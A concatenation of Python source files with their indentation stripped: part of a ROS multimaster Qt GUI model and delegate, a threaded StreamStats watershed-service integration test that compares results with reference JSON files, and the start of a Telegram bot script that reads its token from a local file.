def updateMasterView(self, parent):
'''
This method is called after the master state is changed to update the
representation of the master. The name will not be changed, but all other
data.
@param parent: Item which contains this master item. This is needed to update
other columns of this master.
@type parent: U{QtGui.QStandardItem<https://srinikom.github.io/pyside-docs/PySide/QtGui/QStandardItem.html>}
'''
if parent is not None:
# update the name decoration
child = parent.child(self.row(), MasterModel.COL_NAME)
if child is not None:
self.updateNameView(self.master, self.quality, child)
def updateNameView(self, master, quality, item):
'''
Updates the representation of the column contains the name state.
@param master: the topic data
@type master: fkie_master_discovery.TopicInfo
@param item: corresponding item in the model
@type item: L{TopicItem}
'''
tooltip = ''.join(['<html><body>'])
tooltip = ''.join([tooltip, '<h4>', master.uri, '</h4>'])
tooltip = ''.join([tooltip, '<dl>'])
tooltip = ''.join([tooltip, '<dt>', 'IP: ', str(self.master_ip), '</dt>'])
if master.online:
if quality is not None and quality != -1.:
tooltip = ''.join([tooltip, '<dt>', 'Quality: ', str(quality), ' %', '</dt>'])
else:
tooltip = ''.join([tooltip, '<dt>', 'Quality: not available, start <b>master_discovery</b> with <b>heartbeat_hz</b> parameter >= %.02f</dt>' % DiscoveredMaster.MIN_HZ_FOR_QUALILTY])
else:
tooltip = ''.join([tooltip, '<dt>', 'offline', '</dt>'])
tooltip = ''.join([tooltip, '</dl>'])
if item.descr:
tooltip = ''.join([tooltip, item.descr])
# update the icon
if master.online:
timediff = abs(self._timediff) > nm.settings().max_timediff
if self._master_errors or self._diagnostics or self.master_ip is None or timediff:
item.setIcon(self.ICONS['warning'])
if timediff:
tooltip = ''.join([tooltip, '<h4>', '<font color="#CC0000">Time difference to the host is about %.3f seconds!</font>' % self._timediff, '</h4>'])
item.setIcon(self.ICONS['clock_warn'])
if self.master_ip is None:
tooltip = ''.join([tooltip, '<h4>', '<font color="#CC0000">Host not reachable by name!!! The ROS topics may not by connected!!!</font>', '</h4>'])
if self._master_errors:
tooltip = ''.join([tooltip, '<h4>Errors reported by master_discovery:</h4>'])
for err in self._master_errors:
tooltip = ''.join([tooltip, '<dt><font color="#CC0000">%s</font></dt>' % err])
for diag in self._diagnostics:
tooltip = ''.join([tooltip, '<dt><font color="#CC0000">%s</font></dt>' % diag.message])
elif quality is not None and quality != -1.:
if quality > 30:
item.setIcon(self.ICONS['green'])
elif quality > 5:
item.setIcon(self.ICONS['yellow'])
else:
item.setIcon(self.ICONS['red'])
else:
item.setIcon(self.ICONS['grey'])
else:
item.setIcon(self.ICONS['disconnected'])
tooltip = ''.join([tooltip, '</body></html>'])
item.setToolTip(tooltip)
def update_description(self, descr):
self.descr = descr
self.updateNameView(self.master, self.quality, self)
@classmethod
def toHTML(cls, text):
'''
@param text: the text
@type text: C{str}
@return: the HTML representation of the name of the text
@rtype: C{str}
'''
ns, sep, name = text.rpartition('/')
result = ''
if sep:
result = ''.join(['<html><body>', '<span style="color:gray;">', str(ns), sep, '</span><b>', name, '</b></body></html>'])
else:
result = name
return result
def type(self):
return MasterItem.ITEM_TYPE
def __eq__(self, item):
if isstring(item):
return self.master.name.lower() == item.lower()
elif not (item is None):
return self.master.name.lower() == item.master.name.lower()
return False
def __gt__(self, item):
if isstring(item):
local = False
try:
local = nm.is_local(item)
except Exception:
pass
if self.local and not local: # local hosts are at the top
return False
return self.master.name.lower() > item.lower()
elif not (item is None):
if self.local and not item.local: # local hosts are at the top
return False
return self.master.name.lower() > item.master.name.lower()
return False
class MasterModel(QStandardItemModel):
'''
The model to manage the list with masters in ROS network.
'''
sync_start = Signal(str)
sync_stop = Signal(str)
header = [('Sync', 28), ('Name', -1)]
'''@ivar: the list with columns C{[(name, width), ...]}'''
COL_SYNC = 0
COL_NAME = 1
COL_SYNCBTN = 2
def __init__(self, local_masteruri=None):
'''
Creates a new list model.
'''
QStandardItemModel.__init__(self)
self.setColumnCount(len(MasterModel.header))
self._masteruri = local_masteruri
self.parent_view = None
self.pyqt_workaround = dict() # workaround for using with PyQt: store the python object to keep the defined attributes in the MasterItem subclass
def flags(self, index):
'''
@param index: parent of the list
@type index: U{QtCore.QModelIndex<https://srinikom.github.io/pyside-docs/PySide/QtCore/QModelIndex.html>}
@return: Flag or the requestet item
@rtype: U{QtCore.Qt.ItemFlag<https://srinikom.github.io/pyside-docs/PySide/QtCore/Qt.html>}
@see: U{http://www.pyside.org/docs/pyside-1.0.1/PySide/QtCore/Qt.html}
'''
if not index.isValid():
return Qt.NoItemFlags
# item = self.itemFromIndex(index)
# if item and item.master.online:
return Qt.ItemIsSelectable | Qt.ItemIsEnabled
# return Qt.NoItemFlags
def updateMaster(self, master):
'''
Updates the information of the ros master. If the ROS master not exists, it
will be added.
@param master: the ROS master to update
@type master: U{fkie_master_discovery.msg.ROSMaster<http://docs.ros.org/api/fkie_multimaster_msgs/html/msg/ROSMaster.html>}
'''
# remove master, if his name was changed but not the ROS master URI
root = self.invisibleRootItem()
for i in reversed(range(root.rowCount())):
masterItem = root.child(i)
if masterItem.master.uri == master.uri and masterItem.master.name != master.name:
root.removeRow(i)
try:
del self.pyqt_workaround[masterItem.master.name]
except Exception:
pass
break
# update or add a the item
root = self.invisibleRootItem()
doAddItem = True
is_local = nm.is_local(get_hostname(master.uri))
for index in range(root.rowCount()):
masterItem = root.child(index, self.COL_NAME)
if (masterItem == master.name):
# update item
masterItem.master = master
masterItem.updateMasterView(root)
doAddItem = False
break
elif (masterItem > master.name):
self.addRow(master, is_local, root, index)
doAddItem = False
break
if doAddItem:
self.addRow(master, is_local, root, -1)
def addRow(self, master, local, root, index):
'''
Creates the list of the items from master. This list is used for the
visualization of master data as a table row.
@param master: the master data
@type master: fkie_master_discovery.ROSMaster
@param local: whether the master is local or not
@type local: bool
@return: the list for the representation as a row
@rtype: C{[L{MasterItem} or U{QtGui.QStandardItem<https://srinikom.github.io/pyside-docs/PySide/QtGui/QStandardItem.html>}, ...]}
'''
items = []
sync_item = MasterSyncItem(master)
items.append(sync_item)
name_item = MasterItem(master, local)
items.append(name_item)
name_item.parent_item = root
self.pyqt_workaround[master.name] = items # workaround for using with PyQt: store the python object to keep the defined attributes in the MasterItem subclass
# add the items to the data model
if index > -1:
root.insertRow(index, items)
else:
root.appendRow(items)
# add the sync botton and connect the signals
if self.parent_view is not None:
newindex = index if index > -1 else root.rowCount() - 1
self.parent_view.setIndexWidget(self.index(newindex, self.COL_SYNC), sync_item.button.widget)
sync_item.button.clicked.connect(self.on_sync_clicked)
return items
def updateMasterStat(self, master, quality):
'''
Updates the information of the ros master.
@param master: the ROS master to update
@type master: C{str}
@param quality: the quality of the connection to master
@type quality: C{float}
'''
root = self.invisibleRootItem()
for i in reversed(range(root.rowCount())):
masterItem = root.child(i, self.COL_NAME)
if masterItem.master.name in master:
masterItem.quality = quality
break
def setChecked(self, master, state):
'''
Set the master to checked state
@param master: the ROS master to update
@type master: C{str}
@param state: new state
@type state: C{bool}
'''
root = self.invisibleRootItem()
for i in reversed(range(root.rowCount())):
masterItem = root.child(i, self.COL_SYNC)
if masterItem.master.name == master:
masterItem.synchronized = MasterSyncButtonHelper.SYNC if state else MasterSyncButtonHelper.NOT_SYNC
break
def removeMaster(self, master):
'''
Remove the master with given name.
@param master: the ROS master to add
@type master: C{str}
'''
root = self.invisibleRootItem()
for i in reversed(range(root.rowCount())):
masterItem = root.child(i, self.COL_NAME)
if masterItem.master.name == master:
root.removeRow(i)
try:
del self.pyqt_workaround_sync[masterItem.master.name]
del self.pyqt_workaround_info[masterItem.master.name]
except Exception:
pass
break
def updateMasterErrors(self, master, errors):
'''
Updates the errors reported by master_discovery.
@param master: the ROS master to update
@type master: C{str}
@param errors: the list with errors
@type errors: C{[str]}
'''
root = self.invisibleRootItem()
for i in reversed(range(root.rowCount())):
masterItem = root.child(i, self.COL_NAME)
if masterItem.master.name == master:
masterItem.updateMasterErrors(errors)
break
def add_master_error(self, master, msg):
'''
Add error to the error list.
:param str master: the ROS master to update
:param str msg: error message
'''
root = self.invisibleRootItem()
for i in reversed(range(root.rowCount())):
masterItem = root.child(i, self.COL_NAME)
if masterItem.master.name == master:
masterItem.add_master_error(msg)
break
def update_master_diagnostic(self, master_name, diagnostics):
root = self.invisibleRootItem()
for i in reversed(range(root.rowCount())):
masterItem = root.child(i, self.COL_NAME)
if masterItem.master.name == master_name:
masterItem.update_master_diagnostics(diagnostics)
break
def updateTimeDiff(self, master, timediff):
'''
Updates the time difference reported by master_discovery.
@param master: the ROS master to update
@type master: C{str}
@param timediff: the time difference to the host
@type timediff: float
'''
root = self.invisibleRootItem()
for i in reversed(range(root.rowCount())):
masterItem = root.child(i, self.COL_NAME)
if masterItem.master.name == master:
masterItem.updateTimeDiff(timediff)
break
def update_description(self, master, descr):
'''
Updates the description of the master with given name.
@param master: the ROS master to add
@type master: C{str}
@param descr: the description of the master coded as HTML
@type descr: C{str}
'''
root = self.invisibleRootItem()
for i in range(root.rowCount()):
masterItem = root.child(i, self.COL_NAME)
if masterItem and masterItem.master.name == master:
masterItem.update_description(descr)
def on_sync_clicked(self, checked, masteruri):
if checked:
self.sync_start.emit(masteruri)
else:
self.sync_stop.emit(masteruri)
class MasterIconsDelegate(QItemDelegate):
def __init__(self, parent=None, *args):
QItemDelegate.__init__(self, parent, *args)
self._idx_icon = 1
self._hspacing = 2
self._vspacing = 4
self._icon_size = 0
self._enabled = True
self.IMAGES = {}
def _scale_icons(self, icon_size):
self._icon_size = icon_size
params = (self._icon_size, self._icon_size, Qt.IgnoreAspectRatio, Qt.SmoothTransformation)
self.IMAGES = {'green': nm.settings().image('stock_connect_green.png').scaled(*params),
'yellow': nm.settings().image('stock_connect_yellow.png').scaled(*params),
'red': nm.settings().image('stock_connect_red.png').scaled(*params),
'grey': nm.settings().image('stock_connect.png').scaled(*params),
'disconnected': nm.settings().image('stock_disconnect.png').scaled(*params),
'warning': nm.settings().image('crystal_clear_warning.png').scaled(*params),
'clock_warn': nm.settings().image('crystal_clear_xclock_fail.png').scaled(*params),
'cpu_warn': nm.settings().image('hight_load.png').scaled(*params),
'cpu_temp_warn': nm.settings().image('temperatur_warn.png').scaled(*params),
'hdd_warn': nm.settings().image('crystal_clear_hdd_warn.png').scaled(*params),
'net_warn': nm.settings().image('sekkyumu_net_warn.png').scaled(*params),
'mem_warn': nm.settings().image('mem_warn.png').scaled(*params)
}
def set_enabled(self, value):
self._enabled = value
def paint(self, painter, option, index):
# update the icon size and resize images if needed
if option.rect.height() - self._vspacing * 2 != self._icon_size:
self._icon_size = option.rect.height() - self._vspacing * 2
self._scale_icons(self._icon_size)
painter.save()
self._idx_icon = 1
item = index.model().itemFromIndex(index)
if option.state & QStyle.State_Selected:
painter.fillRect(option.rect, option.palette.highlight())
if isinstance(item, MasterItem):
tooltip = '<html><body>'
tooltip = '%s\n<h4>%s</h4>' % (tooltip, item.master.uri)
tooltip = '%s\n<dt>IP: %s</dt>' % (tooltip, str(item.master_ip))
if item.master.online:
if item.quality is not None and item.quality != -1.:
tooltip = '%s\n<dt>Quality: %.2f </dt>' % (tooltip, item.quality)
else:
tooltip = '%s\n<dt>Quality: not available, start <b>master_discovery</b> with <b>heartbeat_hz</b> parameter >= %.02f</dt>' % (tooltip, DiscoveredMaster.MIN_HZ_FOR_QUALILTY)
else:
tooltip = '%s\n<dt>offline</dt>' % (tooltip)
# update warnings
if item.master.online:
master_errors = item.master_errors
if master_errors or item.master_ip is None:
rect = self.calcDecorationRect(option.rect)
painter.drawImage(rect, self.IMAGES['warning'])
if item.master_ip is None:
tooltip = '%s\n<h4><font color="#CC0000">Host not reachable by name! The ROS topics may not by connected!</font></h4>' % (tooltip)
if master_errors:
tooltip = '%s\n<h4>Errors reported by master_discovery:</h4>' % (tooltip)
for err in master_errors:
tooltip = '%s\n<dt><font color="#CC0000">%s</font></dt>' % (tooltip, err)
elif self._enabled:
rect = self.calcDecorationRect(option.rect)
if item.quality is not None and item.quality != -1.:
if item.quality > 30:
painter.drawImage(rect, self.IMAGES['green'])
elif item.quality > 5:
painter.drawImage(rect, self.IMAGES['yellow'])
else:
painter.drawImage(rect, self.IMAGES['red'])
else:
painter.drawImage(rect, self.IMAGES['grey'])
# check for time difference
timediff = abs(item._timediff) > nm.settings().max_timediff
if timediff:
tooltip = '%s\n<h4><font color="#CC0000">Time difference to the host is about %.3f seconds!</font></h4>' % (tooltip, item._timediff)
rect = self.calcDecorationRect(option.rect)
painter.drawImage(rect, self.IMAGES['clock_warn'])
else:
rect = self.calcDecorationRect(option.rect)
painter.drawImage(rect, self.IMAGES['disconnected'])
# update diagnostic warnings
for diag in item.diagnostics:
if diag.level > 0:
tooltip = '%s\n<dt><font color="#CC0000">%s</font></dt>' % (tooltip, diag.message.replace('>', '>').replace('<', '<'))
if 'Network Load' in diag.name:
rect = self.calcDecorationRect(option.rect)
painter.drawImage(rect, self.IMAGES['net_warn'])
if 'CPU Load' in diag.name:
rect = self.calcDecorationRect(option.rect)
painter.drawImage(rect, self.IMAGES['cpu_warn'])
if 'CPU Temperature' in diag.name:
rect = self.calcDecorationRect(option.rect)
painter.drawImage(rect, self.IMAGES['cpu_temp_warn'])
if 'Memory Usage' in diag.name:
rect = self.calcDecorationRect(option.rect)
painter.drawImage(rect, self.IMAGES['mem_warn'])
if 'HDD Usage' in diag.name:
rect = self.calcDecorationRect(option.rect)
painter.drawImage(rect, self.IMAGES['hdd_warn'])
# update description from robot description parameter
if item.descr:
tooltip = '%s\n%s' % (tooltip, item.descr)
# paint the name of the host
tooltip = '%s\n</body></html>' % (tooltip)
item.setToolTip(tooltip)
rect = self.calcDecorationRect(option.rect, image=False)
painter.drawText(rect, Qt.AlignVCenter, item.name)
painter.restore()
def calcDecorationRect(self, main_rect, image=True):
rect = QRect()
rect.setX(main_rect.x() + self._idx_icon + self._hspacing)
rect.setY(main_rect.y() + self._vspacing)
rect.setWidth(self._icon_size if image else main_rect.width() - self._idx_icon)
rect.setHeight(self._icon_size)
self._idx_icon += self._icon_size + self._hspacing
return rect
|
IntegrationWrapperV2.py | #Integration testing for watershed deliniation
import traceback
import datetime
import time
import os
import argparse
import fnmatch
import json
import threading
from WIMLib.WiMLogging import WiMLogging
from WIMLib import Shared
from WIMLib.Config import Config
from ServiceAgents.StreamStatsServiceAgent import StreamStatsServiceAgent
from threading import Thread
import random
import queue
#Initial number of thread calls will be (N+1)
simulThreads = 0
queue_list = queue.Queue()
#Open config file and define workspace
config = json.load(open(os.path.join(os.path.dirname(__file__), 'config.json')))
Config (config)
workingDir = Shared.GetWorkspaceDirectory (config["workingdirectory"]) #initialize and create logging folder w file
#Create Summary.txt in the root folder of streamstats (Need to change directory)
sumPath = os.path.join (workingDir, 'Summary.txt')
fSummary = open (sumPath, 'w+')
fSummary.write ( 'Starting Summary'+ '\n')
fSummary.write ( 'Total all runs: 0'+ '\n')
fSummary.write ( 'Total bchar runs: 0'+ '\n')
fSummary.write ( 'Total bdel runs: 0'+ '\n')
fSummary.write ( 'Total flowstats runs: 0'+ '\n')
fSummary.write ( 'Total bcharNoteq runs: 0'+ '\n')
fSummary.write ( 'Total bdelNoteq runs: 0'+ '\n')
fSummary.write ( 'Total flowstatsNoteq runs: 0'+ '\n')
fSummary.write ( 'Total bcharfail runs: 0'+ '\n')
fSummary.write ( 'Total bdelfail runs: 0'+ '\n')
fSummary.write ( 'Total flowstatsfail runs: 0'+ '\n')
fSummary.write ( 'Total bcharNew runs: 0'+ '\n')
fSummary.write ( 'Total bdelNew runs: 0'+ '\n')
fSummary.write ( 'Total flowstatsNew runs: 0'+ '\n')
fSummary.write ( 'Total bcharrep runs: 0'+ '\n')
fSummary.write ( 'Total flowstatsrep runs: 0'+ '\n')
fSummary.close ()
WiMLogging (workingDir)
#Used for command line
parser = argparse.ArgumentParser()
parser.add_argument ("-file", help="specifies csv file location including gage lat/long and comid's to estimate", type=str, #Use the following LAT/LON pour point
default = config["referenceCoordinates"]) #Change to the location of the csv file
parser.add_argument ("-inputEPSG_Code", help="Default WGS 84 (4326),see http://spatialreference.org/ref/epsg/ ", type=int,
default = '4326')
args = parser.parse_args()
#Check if file (Input.csv) is in csv
print(args.file)
if not os.path.isfile(args.file): raise Exception ("File does not exist")
refDir = {"bdel": StreamStatsServiceAgent.CheckDirectoryExists(config["referenceFolderBasinDel"]),"bchar":StreamStatsServiceAgent.CheckDirectoryExists(config["referenceFolderBasinChar"]), "flowstats":StreamStatsServiceAgent.CheckDirectoryExists(config["referenceFolderFlowStats"])}
file = Shared.readCSVFile(args.file)
#file = Shared.readURL (url)
headers = file[0]
rcode = headers.index("State") if "State" in headers else 0
x = headers.index("dec_long") if "dec_long" in headers else 1
y = headers.index("dec_lat") if "dec_lat" in headers else 2
uniqueID = headers.index("GageID") if "GageID" in headers else 3
file.pop(0)
#Start logging txt
startTime = time.time()
WiMLogging().sm ("Starting routine")
#Count total number of rows, and initiate equal number of threads
row_count = sum(1 for row in file) #Total number of sites
maxThreads = row_count #Equal to the number of sites
#timing decorator for functions
def timing(f):
def wrap(*args):
time1 = time.time()
ret = f(*args)
time2 = time.time()
WiMLogging().sm ('{:s} function took {:.3f} s'.format(f.__name__, (time2-time1))) #we can specify to append to a txt file
return ret
return wrap
def findStr (x,y):
resultBChar = x
ind = [] #Look for string (value) inside of the parameters. We should have 20 of them returned from the server.
for i in range (0,len (resultBChar)):
tempind = str(resultBChar[i]).find(str(y))
ind.append (tempind)
return (sum(i > 0 for i in ind))
#Main function that run by a thread
def run(i, q): #j is a mutable counter for a function (currently this will track number of sites executed)
rcode,x,y,refdir,iden,workspace = q.get() #Target function for threads to run to get sites
try:
run_func (rcode, x, y,
refdir,iden,workspace) #main function for threads to run to get data from server
except:
tb = traceback.format_exc()
WiMLogging().sm ("Error w/ run "+ tb)
finally:
counterOverwrite (sumPath, 'all')
q.task_done()
#Background function run for each site
def run_func(rcode, x, y,
path, siteIdentifier, workingDir):
response = None
resultBChar = None
resultBDel = None
bcharServer = None
flowStatsServer = None
flowStatsResponse = None
with StreamStatsServiceAgent() as sa:
try:
#Recursive call with 1 second interval for basin deliniation, limit to 5 calls
@timing
def rcBDel (f = 0):
try:
if (f >4):
return None
else:
#counterOverwrite (sumPath, 'bdel')
response = sa.getBasin(rcode,x,y,4326)
c = len(response[0]['featurecollection'][1]['feature']['features'][0]['geometry']['coordinates'][0])
return (response) #Get feature collection
except:
WiMLogging().sm('Attempting rcBDel')
f +=1
time.sleep (1)
rcBDel (f)
#Recursive call for basin characteristics, limit to 5 calls for basin characteristics and 5 calls for basin deliniation
@timing
def rcBChar ( rcode, response, j = 0):
try:
if (j>4):
return None
else:
#counterOverwrite (sumPath, 'bchar')
responseBChar = sa.getBChar (rcode,response['workspaceID']) #get basin characteristics from the server
return responseBChar
except:
response = rcBDel (3)
j+=1
WiMLogging().sm('Attempting rcBChar')
rcBChar(rcode, response[0], j)
@timing
def rcFlowStats ( rcode, response, j = 0):
try:
if (j>4):
return None
else:
#counterOverwrite (sumPath, 'bchar')
responseFlowStats = sa.getFlowStats (rcode,response['workspaceID']) #get basin characteristics from the server
return responseFlowStats
except:
response = rcBDel (3)
j+=1
WiMLogging().sm('Attempting rcFlowStats')
rcFlowStats(rcode, response[0], j)
#Get response of rcBDel
response = rcBDel ()
resultBDel = response[0]['featurecollection'][1]['feature']['features'][0]['geometry']['coordinates'][0] #List of lists
HUCID = response[0] ['featurecollection'][1]['feature']['features'][0]['properties']['HUCID']
xy = [x,y]
bdelServer = response[1]['usgswim-hostname']
resultBChar = rcBChar(rcode, response[0], 0)
bcharServer = resultBChar[1]['usgswim-hostname']
flowStatsResponse = rcFlowStats(rcode, response[0], 0)
resultFlowStats = flowStatsResponse[0]
flowStatsServer = flowStatsResponse[1]['usgswim-hostname']
except:
if response == None:
resultBDel = None
resultBChar = None
resultFlowStats = None
if resultBDel == None:
fSummary = open(sumPath, 'a')
fSummary.write (rcode + ', ' + str(siteIdentifier)+ ':' + ' Missing Return for BDel'+ '\n')
counterOverwrite (sumPath, 'bdelfail')
fSummary.close ()
print ("Finished: ", siteIdentifier)
WiMLogging().sm ("{0} Failed to return from service BDel".format(siteIdentifier))
else:
compare(resultBDel, path.get("bdel"), siteIdentifier,
workingDir, HUCID, xy, rcode,bdelServer)
if bcharServer == None or resultBChar == None:
fSummary = open(sumPath, 'a')
fSummary.write (rcode + ', ' + str(siteIdentifier)+ ':' + ' Missing Return for BChar'+ '\n')
counterOverwrite (sumPath, 'bcharfail')
fSummary.close ()
print ("Finished with error: ", siteIdentifier)
WiMLogging().sm ("{0} Failed to return from service Bchar".format(siteIdentifier))
else:
compare(resultBChar, path.get("bchar"), siteIdentifier,
workingDir, HUCID, xy, rcode, bcharServer)
if flowStatsServer == None or resultFlowStats == None:
fSummary = open(sumPath, 'a')
fSummary.write (rcode + ', ' + str(siteIdentifier)+ ':' + ' Missing Return for FlowStats'+ '\n')
counterOverwrite (sumPath, 'flowstatfail')
fSummary.close ()
print ("Finished with error: ", siteIdentifier)
WiMLogging().sm ("{0} Failed to return from service FlowStats".format(siteIdentifier))
else:
##TODO: getting issues with dumping the json in the files, it's stopping at the comma...
compare(resultFlowStats, path.get("flowstats"), siteIdentifier,
workingDir, HUCID, xy, rcode, flowStatsServer)
print ("Finished: ", siteIdentifier)
def writeToJSONFile (path, fileName, data): #Define function to write as json object #https://gist.github.com/keithweaver/ae3c96086d1c439a49896094b5a59ed0
try:
filePathNameWExt = os.path.join(path,fileName+".json")
with open(filePathNameWExt, "w+") as fp:
json.dump(data, fp)
except:
tb=traceback.format_exc()
WiMLogging().sm("Error writing json output "+tb)
def counterOverwrite (input_txt, param_string):
#Create Summary.txt in the root folder of streamstats (Need to change directory)
with open(input_txt, 'r') as myfile:
datas = myfile.read()
myfile.close()
datList = datas
datas = datas.split('\n')
del datas[len(datas)-1]
repline = None
newline = None
for line in datas:
vList = (line.split())
if (vList[1] == param_string):
v = vList [3] #value in the string is 4th after splitting (Timur gives high 5) 5 is the value
v = int(v)+1
vList[3] = str(v)
seperator = ' '
newline = seperator.join(vList)
repline = line
# Write the file out again
if (repline is not None and newline is not None):
with open(input_txt, 'w') as myfile:
datList = datList.replace(repline, newline)
myfile.write(datList)
myfile.close ()
def compare (inputObj, path, ID, workingDir,
HUCID, xy, rcode, servName): #Compare json txt files
# TODO: improve notifications of differences, maybe add new property for "oldValue"
try:
refObj = None
refFile = os.path.join(path, ID+".json") #Get the reference json file from existing root folder
if isinstance(inputObj[0], dict) and path.find('Char')>0: #Condition: If the inner object of the list is dictionary
inputPars = inputObj[0]['parameters']
i = 0
dictlist = [[] for _ in range (len(inputPars))] #Initialize list of lists
while i < len(inputPars):
dic = (inputPars[i]) #Extract dictionary object i
for key in sorted(dic): #Sort it by keys and extract each key, next, append to the dictionary
dictlist[i].append({key:str(dic[key])})
i += 1
inputObj = dictlist #Return sorted list of lists instead of list of dictionaries for basin characteristics
if os.path.isfile(refFile):
with open (refFile) as f:
refObj = json.load(f)
if inputObj!= refObj:
dif = []
dif.append ([j for j in inputObj if not j in refObj])
if (path.find('Char')>0):
fSummary = open(sumPath, 'a')
fSummary.write (str(ID)+ ':' + ' BChar not Equal'+ '\n')
fSummary.write (str(ID)+ ':' + str(HUCID) + ' HUCID'+ '\n')
fSummary.write (str(ID)+ ':' + str(xy) +' xy coordinates'+ '\n')
fSummary.write (str(ID)+ ':' + str(rcode) +' State'+ '\n')
fSummary.write (str(ID)+ ':' + str(servName) +' Server '+ '\n')
fSummary.write (str(ID)+ ':' + str(dif) +' Difference between NewCall and Ref'+ '\n')
counterOverwrite (sumPath, 'bcharNoteq')
X1 = refObj
X2 = inputObj
#merge two dictionaries and add missing values if any
dictOutput = []
for i in range (0, len(X1)):
finalMap1 = {}
for d in X1[i]:
finalMap1.update(d)
finalMap2 = {}
for d in X2[i]:
finalMap2.update(d)
union = dict(finalMap1.items() | finalMap2.items()) #get the union of dictionaries
dictlist = []
for key in sorted(union): #Sort it by keys and extract each key, next append to the dictionary
dictlist.append({key:str(union[key])})
dictOutput.append(dictlist)
if (dictOutput != refObj): #if output dictionary is not equal to the reference one, replace it
WiMLogging().sm ('Updated Bchar in the reference folder : ', str(ID) )
refObj = dictOutput
fSummary.write (str(ID)+ ':' +'Bchar gets replaced'+ '\n')
fSummary.write (str(ID)+ ':' + 'Bchar in reference' + '\n')
fSummary.write (refObj)
fSummary.write (str(ID)+ ':' + 'Bchar from server call' + '\n')
fSummary.write (dictOutput)
counterOverwrite (sumPath, 'bcharrep')
counterOverwrite (sumPath, 'bchar')
fSummary.close ()
elif (path.find('Del')>0):
fSummary = open(sumPath, 'a')
fSummary.write (str(ID)+ ':' + ' BDel not Equal'+ '\n')
fSummary.write (str(ID)+ ':' + str(HUCID) + ' HUCID'+ '\n')
fSummary.write (str(ID)+ ':' + str(xy) +' xy coordinates'+ '\n')
fSummary.write (str(ID)+ ':' + str(rcode) +' State'+ '\n')
fSummary.write (str(ID)+ ':' + str(servName) +' Server '+ '\n')
fSummary.write (str(ID)+ ':' + str(dif) +' Difference between Newcall and Ref'+ '\n')
counterOverwrite (sumPath, 'bdelNoteq')
counterOverwrite (sumPath, 'bdel')
fSummary.close ()
else:
fSummary = open(sumPath, 'a')
fSummary.write (str(ID)+ ':' + ' FlowStats not Equal'+ '\n')
fSummary.write (str(ID)+ ':' + str(HUCID) + ' HUCID'+ '\n')
fSummary.write (str(ID)+ ':' + str(xy) +' xy coordinates'+ '\n')
fSummary.write (str(ID)+ ':' + str(rcode) +' State'+ '\n')
fSummary.write (str(ID)+ ':' + str(servName) +' Server '+ '\n')
fSummary.write (str(ID)+ ':' + str(dif) +' Difference between NewCall and Ref'+ '\n')
counterOverwrite (sumPath, 'flowstatsNoteq')
X1 = refObj
X2 = inputObj
#merge two dictionaries and add missing values if any
dictOutput = []
for i in range (0, len(X1)):
finalMap1 = {}
for d in X1[i]:
finalMap1.update(d)
finalMap2 = {}
for d in X2[i]:
finalMap2.update(d)
union = dict(finalMap1.items() | finalMap2.items()) #get the union of dictionaries
dictlist = []
for key in sorted(union): #Sort it by keys and extract each key, next append to the dictionary
dictlist.append({key:str(union[key])})
dictOutput.append(dictlist)
if (dictOutput != refObj): #if output dictionary is not equal to the reference one, replace it
WiMLogging().sm ('Updated FlowStats in the reference folder : ', str(ID) )
refObj = dictOutput
fSummary.write (str(ID)+ ':' + 'FlowStats gets replaced'+ '\n')
fSummary.write (str(ID)+ ':' + 'FlowStats in reference' + '\n')
fSummary.write (refObj)
fSummary.write (str(ID)+ ':' + 'FlowStats from server call' + '\n')
fSummary.write (dictOutput)
counterOverwrite (sumPath, 'flowstatsrep')
counterOverwrite (sumPath, 'flowstats')
fSummary.close ()
WiMLogging().sm("Not equal Json's"+" "+ID)
writeToJSONFile(workingDir,ID+"_"+str(path.rsplit('/', 1)[-1]),inputObj) #Store in log folder
else:
if (path.find('Char')>0):
fSummary = open(sumPath, 'a')
fSummary.write (rcode + ', ' + str(ID)+ ':' + 'BChar Equal Jsons' + '\n')
counterOverwrite (sumPath, 'bchar')
fSummary.close ()
elif (path.find('Del')>0):
fSummary = open(sumPath, 'a')
fSummary.write (rcode + ', ' + str(ID)+ ':' + 'BDel Equal Jsons' + '\n')
counterOverwrite (sumPath, 'bdel')
fSummary.close ()
else:
fSummary = open(sumPath, 'a')
fSummary.write (rcode + ', ' + str(ID)+ ':' + 'FlowStats Equal Jsons' + '\n')
counterOverwrite (sumPath, 'flowstats')
fSummary.close ()
tb = traceback.format_exc()
WiMLogging().sm("Equal Json's"+" "+ID+" "+ tb) #Don't create file
else:
if (path.find('Char')>0):#file not in reference folder, Create it
fSummary = open(sumPath, 'a')
fSummary.write (rcode + ', ' + str(ID)+ ':' + 'BChar New'+ '\n')
counterOverwrite (sumPath, 'bcharNew')
counterOverwrite (sumPath, 'bchar')
fSummary.close ()
elif (path.find('Del')>0):
fSummary = open(sumPath, 'a')
fSummary.write (rcode + ', ' + str(ID)+ ':' + ' BDel New'+ '\n')
counterOverwrite (sumPath, 'bdelNew')
counterOverwrite (sumPath, 'bdel')
fSummary.close()
else:
fSummary = open(sumPath, 'a')
fSummary.write (rcode + ', ' + str(ID)+ ':' + ' FlowStats New'+ '\n')
counterOverwrite (sumPath, 'flowstatsNew')
counterOverwrite (sumPath, 'flowstats')
fSummary.close()
WiMLogging().sm("File not in reference folder"+" "+refFile)
writeToJSONFile(path, ID,inputObj)
except:
counterOverwrite (sumPath, 'bcharfail')
counterOverwrite (sumPath, 'bdelfail')
counterOverwrite (sumPath, 'flowstatsfail')
tb=traceback.format_exc()
WiMLogging().sm("Error Comparing "+tb)
writeToJSONFile(workingDir, ID+"_viaError",{'error':tb})
#Main thread
for i in range(maxThreads): #Run threads as daemon, so they close when finish
worker = Thread(target=run, args=(i, queue_list,))
worker.setDaemon(True)
time.sleep(0.1)
worker.start()
#Global var counting number of active threads
threadsINI = threading.active_count()
f = 0
for row in file: #Query to invoke threads !
queue_list.put((row[rcode], row[x], row[y],
refDir, row[uniqueID], workingDir))
WiMLogging().sm ('***Calling Input: '+ row[uniqueID])
if f == simulThreads:
while f == simulThreads and threading.active_count() == threadsINI: #Listener
pass #Inifite loop waiting for thread to be done with work
time.sleep (0.5) #There is a chance to run into error if two threads finished simultaniously within 0.1 or higher interval
if threading.active_count()<threadsINI:
print ('Initialized') #Each initialized statement should follow Finished one
f = simulThreads - (threadsINI-threading.active_count ())+1
threadsINI = threading.active_count ()
else:
f=f+1
queue_list.join() #Close mainthread after child threads done working
print ('*** Done')
|
main.py | from telegram.ext import Updater,CommandHandler, Filters
from promise import Promise
import story, errors, os, logging, hints
import time, threading, pickle, users
import sys
from threading import Thread
with open("api/TOKEN") as token_file:
token = token_file.read().strip()
with open("api/OWNERS") as owner_file:
owners = owner_file.readlines()
def send_source(bot, update):
